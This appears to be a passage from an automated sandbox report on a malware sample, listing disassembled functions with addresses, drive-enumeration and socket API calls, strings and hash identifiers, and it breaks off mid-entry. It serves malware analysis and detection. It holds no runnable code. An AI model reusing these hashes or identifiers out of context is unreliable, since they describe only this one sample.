                                    Function 07420077 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 488COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: e5b9f0d0f0efca4d8620659425e6f5c0f10049f5583eccf0b695746a98e8d26b
                                    • Instruction ID: a21ae641236edb0f7aa8591d0b3a5c9e48817fcbf971b9d2835e30e99a383f46
                                    • Opcode Fuzzy Hash: e5b9f0d0f0efca4d8620659425e6f5c0f10049f5583eccf0b695746a98e8d26b
                                    • Instruction Fuzzy Hash: F4914DEB26C131BD7142C1852B14AFB5BAEE5C7730BB1C82BF807D6516E2944E6B6035
                                    Function 074200ED Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 487COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 47b17e223a4e2c0790ab30f31099e8338fb92ce90f134905df50109fb999aed5
                                    • Instruction ID: 6345cdb0e019539274e1094ce5c943827d88673d7851840ff56a498faa2477e1
                                    • Opcode Fuzzy Hash: 47b17e223a4e2c0790ab30f31099e8338fb92ce90f134905df50109fb999aed5
                                    • Instruction Fuzzy Hash: 36915BEB26C131BD7142C1852B14AFB6BAEE5C7730BB1C82BF807D5512E2984E6B7035
                                    Function 07420068 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 486COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 4bd809dcf7bee4fd43e2026b72b6c925f36e903860238ee053b7f3ae072b49f9
                                    • Instruction ID: e352b1ac7f98cf0b4c280dfa4ae7ea5fa19f6dacbdcc08a8d06a1e3f88e05b08
                                    • Opcode Fuzzy Hash: 4bd809dcf7bee4fd43e2026b72b6c925f36e903860238ee053b7f3ae072b49f9
                                    • Instruction Fuzzy Hash: D1915DEB26D131BD7142C1452B14AFB66AEE4C7730BB1C82BF807D5516E2944E6F7035
                                    Function 074200AE Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 465COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: c967abdf24a13f31996ce01d602e1f6d3ce0df8d201bdc0f5d05f455c480b4e5
                                    • Instruction ID: 8d99e126fbb7a9fb94d6ed77f8f395ccff8283f287d4ee22e5cefb35ee8aec83
                                    • Opcode Fuzzy Hash: c967abdf24a13f31996ce01d602e1f6d3ce0df8d201bdc0f5d05f455c480b4e5
                                    • Instruction Fuzzy Hash: 04915BEB26C131BD7142C1852B54AFB6BAEE5C7730BB1C82BF807D5522E2944E6B7035
                                    Function 074200C4 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 451COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 1755bcb770fd2e96256283b73fb00d9d34cc5b0b278c108e73c6179b18a92cd8
                                    • Instruction ID: d56492590967824bf84b441719d562724026443225fde647427453cd1dccd977
                                    • Opcode Fuzzy Hash: 1755bcb770fd2e96256283b73fb00d9d34cc5b0b278c108e73c6179b18a92cd8
                                    • Instruction Fuzzy Hash: E0815BEB26C131BD7142C1852B14AFB6AAEE5C7730BB1C82BF807D5512E2984E6B7035
                                    Function 0742010F Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 448COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 1b3dc3e95520dcaa3ccd0be69264c1fe786afd17360abf284df24931820ef7e2
                                    • Instruction ID: 4e47f40ece1dda3a7442d4a0c1df6e5402674d743d8c514c374008923a03ee31
                                    • Opcode Fuzzy Hash: 1b3dc3e95520dcaa3ccd0be69264c1fe786afd17360abf284df24931820ef7e2
                                    • Instruction Fuzzy Hash: AA817EEB26C131BD7142C5852B14AFB6AAEE4C7730BB1C82BF807D6512E2944E6F7135
                                    Function 074200DA Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 444COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 5eecdec4ed38883215926d8620123ef13c36ef376931d0f3e3115a1592695584
                                    • Instruction ID: 065e1d26aecc4cd398f12d71d16339372b649bdc334622adcbbb49ccd626c20b
                                    • Opcode Fuzzy Hash: 5eecdec4ed38883215926d8620123ef13c36ef376931d0f3e3115a1592695584
                                    • Instruction Fuzzy Hash: B0816CEB26C131BD7142C5852B54AFB6BAEE4C7730BB1C82BF807D6512E2944E6B7035
                                    Function 074200FE Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 440COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 4847693c250f77fbf234bcfa3b903d8acc16fe6091752837328fef2e328de9e5
                                    • Instruction ID: e424af4b0cb5a007eec615e900e536e1af74526e7e1f07d1aae024d7021182fa
                                    • Opcode Fuzzy Hash: 4847693c250f77fbf234bcfa3b903d8acc16fe6091752837328fef2e328de9e5
                                    • Instruction Fuzzy Hash: 59817DEB26C131BD7142C1852B14AFB6BAEE5C7730BB1C827F807D6512E2984E6B7035
                                    Function 07420132 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 424COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 67cd36ebf4b6c8e49ae434f4467b357881d002cec4a489006678c8ab745c4576
                                    • Instruction ID: 972f8e84b94269d71de6e24a384b92231387164042848728c119e1157a0fbc01
                                    • Opcode Fuzzy Hash: 67cd36ebf4b6c8e49ae434f4467b357881d002cec4a489006678c8ab745c4576
                                    • Instruction Fuzzy Hash: 9B813CEB26D131BD7142C1852B14AFBABAEE5C7730BB1C827F807D5512E2984E6B7035
                                    Function 07420159 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 401COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 0e80a2017dd688599355957e23ebbda02df0dbbbcc238c4aec95462af599a610
                                    • Instruction ID: fe51506fc7b3c1220541b7fac7aa3fa7b1f44936538d1ebd326a55f6298001ca
                                    • Opcode Fuzzy Hash: 0e80a2017dd688599355957e23ebbda02df0dbbbcc238c4aec95462af599a610
                                    • Instruction Fuzzy Hash: 55715CEB26C131BD7142C1852B14AFB6BAEE5C7730BB1C827F807D5522E2984E6B7035
                                    Function 07420228 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 376COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: ea20bc391a765fc804569a8154ceeee7a59f643caa56501820a1bec35959ce76
                                    • Instruction ID: acb735eecac1ad2c9e4a5b5ec38101f55a86e84ab1b395186e511bdb147c6f0c
                                    • Opcode Fuzzy Hash: ea20bc391a765fc804569a8154ceeee7a59f643caa56501820a1bec35959ce76
                                    • Instruction Fuzzy Hash: 6C7181EB26D131BD7202C1912B14AFB6BAEE4C77307B1C827F807D5512E2984E6B6135
                                    Function 07420183 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 372COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 8e1d568b63b6ff2ce566c703fbbed52bc3248382894c932d9b2b76e052183b28
                                    • Instruction ID: 2208d2c4f0bc0172cc70fab6ae361e4dcfa76df7968c668e471467a3195b5de6
                                    • Opcode Fuzzy Hash: 8e1d568b63b6ff2ce566c703fbbed52bc3248382894c932d9b2b76e052183b28
                                    • Instruction Fuzzy Hash: A7615EEB26C131BE7142C5816B14AFB67AEE5C7730BB1C827F807D5522E2984E6B7035
                                    Function 074201A8 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 363COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: b64139762c3b7ed796bcd6ac267c0a949f2060935baa56485bcc4ddcb33493be
                                    • Instruction ID: 2b6d7f680f0c18f17c4f9004d5ddc7d9a712fadbe1727f6112923044c9037a1d
                                    • Opcode Fuzzy Hash: b64139762c3b7ed796bcd6ac267c0a949f2060935baa56485bcc4ddcb33493be
                                    • Instruction Fuzzy Hash: 4D615FEB26D131BE7142C1816B14AFB66AEE5C7730BB1C827F807D5522E2984F6B7035
                                    Function 074201D1 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 354COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: ca94a578283050b4e558a96cfa2e093fad1496001ae51e5ca3ff28ad02a1c871
                                    • Instruction ID: 51c10df0c32f404c78909a15d2876907afb16b7b77676f1bdc87f68d227f2fb6
                                    • Opcode Fuzzy Hash: ca94a578283050b4e558a96cfa2e093fad1496001ae51e5ca3ff28ad02a1c871
                                    • Instruction Fuzzy Hash: EC6180EB26C131BE7252C1812B14AFB5BAEE5C7730BB1C827F407D5522E2980E6B7135
                                    Function 074201EB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 353COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: e380a5f7162a1842c559f7373ef5823e59ba493953826fe93e24319b8a167717
                                    • Instruction ID: c0961633a9dde9053965bc149afbb8c1f61ef8e6157d116886c03bb5b8f1a72c
                                    • Opcode Fuzzy Hash: e380a5f7162a1842c559f7373ef5823e59ba493953826fe93e24319b8a167717
                                    • Instruction Fuzzy Hash: A26171EB26C131BE7142C1816B14AFB5BAEE5C7730BB1C827F807D5511E2984E6B7035
                                    Function 07420201 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 346COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 434ab14da896b259f2c6077adf516cf8113bd785af3ca670f37221c034a5d5d1
                                    • Instruction ID: 77fb9a241312c5659d1e5a0aec2c376dc98c8076d772010e5f7862b17c8f6b86
                                    • Opcode Fuzzy Hash: 434ab14da896b259f2c6077adf516cf8113bd785af3ca670f37221c034a5d5d1
                                    • Instruction Fuzzy Hash: 0B516DEB26D131BE7142C1812B14AFB6BAEE5C7730BB1C827F407D5522E2980E6B7035
                                    Function 07420210 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 343COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 576f516488e22d4c5fe4844e99a01d2ccb35d57f75cd4afe7033826b78ed396f
                                    • Instruction ID: dca0b8c96c61a1f438adfd43af92f3d4483aa2eecedb746bc1a187b7dfd50c32
                                    • Opcode Fuzzy Hash: 576f516488e22d4c5fe4844e99a01d2ccb35d57f75cd4afe7033826b78ed396f
                                    • Instruction Fuzzy Hash: B8517EEB26C131BE7142C1812B14AFB6BAEE5C7730BB1C827F807D5512E2980E6B7035
                                    Function 07420276 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 311COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: c0b14e299e3843abc519a916de8f80480ffe5acf904b1f6e14b2f89cf8827010
                                    • Instruction ID: 568416b87b35859efc3367120165024d3635210c9c7b0a5570fee1eded8f5c05
                                    • Opcode Fuzzy Hash: c0b14e299e3843abc519a916de8f80480ffe5acf904b1f6e14b2f89cf8827010
                                    • Instruction Fuzzy Hash: 4751A2EB26C131BE7202C1956B14AFB6BADE5C7730BB1C82BF407D5511D2940E6B7135
                                    Function 07420298 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 301COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 1d185e808247654b11cef077a43fbca4e6799f912e6d152c29d875db524f0d90
                                    • Instruction ID: 6755c78741a5733eb8ebd355645d6e1b8abc208b82dfac7346fb93d6db455938
                                    • Opcode Fuzzy Hash: 1d185e808247654b11cef077a43fbca4e6799f912e6d152c29d875db524f0d90
                                    • Instruction Fuzzy Hash: 3C5193EB26D131BE7212C1952B14AFB5AEEE5C7730BB1C827F407D6521D2980EAB7035
                                    Function 0742029D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 299COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 508d462e00ff2ada018a669428fd45dd03afa082dc99efa1a27295b6c0b05340
                                    • Instruction ID: 77ac3933f38369788fa963399f9a5ed8840e3c4ec2f7d92915328e6811cf88ba
                                    • Opcode Fuzzy Hash: 508d462e00ff2ada018a669428fd45dd03afa082dc99efa1a27295b6c0b05340
                                    • Instruction Fuzzy Hash: 4D5192EB26C131BE7102C5912B14AFB57AEE5C7730BB1C827F407C5511D2980EAB7035
                                    Function 006AA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 006AA1C7
                                    Strings
                                    • getsockname() failed with errno %d: %s, xrefs: 006AA1F0
                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 006AA23B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                    • API String ID: 3358416759-2605427207
                                    • Opcode ID: 6126be17b7b4392bc98b9746a041390843c1589d8f178012242bbc25de97b550
                                    • Instruction ID: 67dc59669072fdaa9bad3fa996174490c14111ac3c0be6d2e52ccf4e352f33f9
                                    • Opcode Fuzzy Hash: 6126be17b7b4392bc98b9746a041390843c1589d8f178012242bbc25de97b550
                                    • Instruction Fuzzy Hash: A321FB31808680BAE721AB58DC42FE773BCEF92328F040615F99853151FB325D858BE3
                                    Function 0068D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSAStartup.WS2_32(00000202), ref: 0068D65A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: Startup
                                    • String ID: if_nametoindex$iphlpapi.dll
                                    • API String ID: 724789610-3097795196
                                    • Opcode ID: 6166fc998eb24841055009b983978bb27f929ddbd1109e7bd9112bda49dc0501
                                    • Instruction ID: 7ec00b72bf552cb62c88f49c8ae00efebc4f2edb856e0ea11204ebb363748602
                                    • Opcode Fuzzy Hash: 6166fc998eb24841055009b983978bb27f929ddbd1109e7bd9112bda49dc0501
                                    • Instruction Fuzzy Hash: 8401269098038156EB217B38AC1B7A636A56B52344F89166DEC48D23D2F76AC8D9C373
                                    Function 0073AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0073AB9B
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0073ABE4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: ioctlsocketsocket
                                    • String ID:
                                    • API String ID: 416004797-0
                                    • Opcode ID: cdab9efcea31eb4a4175baeb65aeae4ef10be3e901db755209a193ef651ed8ac
                                    • Instruction ID: dcaf1061ae0b1c1b78871d9a9405d605789b4c9c4571256147ab7b6d1a5384b2
                                    • Opcode Fuzzy Hash: cdab9efcea31eb4a4175baeb65aeae4ef10be3e901db755209a193ef651ed8ac
                                    • Instruction Fuzzy Hash: 52E1B170604302ABEB20CF14C886B6BB7E5EF85314F145A2CF9998B292D779D944CB92
                                    Function 074202B8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 303COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 2e47141f8f16f5d3cf3693cf86fa2049507a7711d19fd0d7c7e070e978afd588
                                    • Instruction ID: 754064f666fb7239ed206d43ecb5f9a034d8f081bf5d757cd0e80924e664d4a3
